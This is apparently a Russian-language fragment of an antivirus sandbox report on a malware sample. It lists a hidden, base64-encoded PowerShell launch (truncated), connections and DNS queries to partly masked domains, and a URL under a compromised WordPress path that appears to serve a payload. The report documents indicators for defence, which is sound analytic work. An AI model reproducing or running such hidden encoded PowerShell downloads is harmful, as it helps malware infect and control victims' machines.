Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABOAGEAaAB4AGIAegB4AG0AbgBzAG0AYgA9ACcARwBiAG0AZABuAG0AZwBoAG4AJwA7ACQAUQBzAGgAaAB0AGwAbgBpAG0AYQBjACAAPQAgACcAOQAwADYAJwA7ACQASgBsAGwAeABpAHkAcwB2AGgAcAA9ACcAUwBiAHAAYgBkAGEAdgB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1440
- %TEMP%\1235262.cvr
- 'mj####anical.com':80
- 'mj####anical.com':443
- http://www.mj####anical.com/wp-includes/ddy/
- 'mj####anical.com':443
- DNS ASK bl###ream.al
- DNS ASK my####thanhbinh.net
- DNS ASK sf##c.biz
- DNS ASK co###print.net
- DNS ASK mj####anical.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABOAGEAaAB4AGIAegB4AG0AbgBzAG0AYgA9ACcARwBiAG0AZABuAG0AZwBoAG4AJwA7ACQAUQBzAGgAaAB0AGwAbgBpAG0AYQBjACAAPQAgACcAOQAwADYAJwA7ACQASgBsAGwAeABpAHkAcwB2AGgAcAA9ACcAUwBiAHAAYgBkAGEAdgB... (со скрытым окном)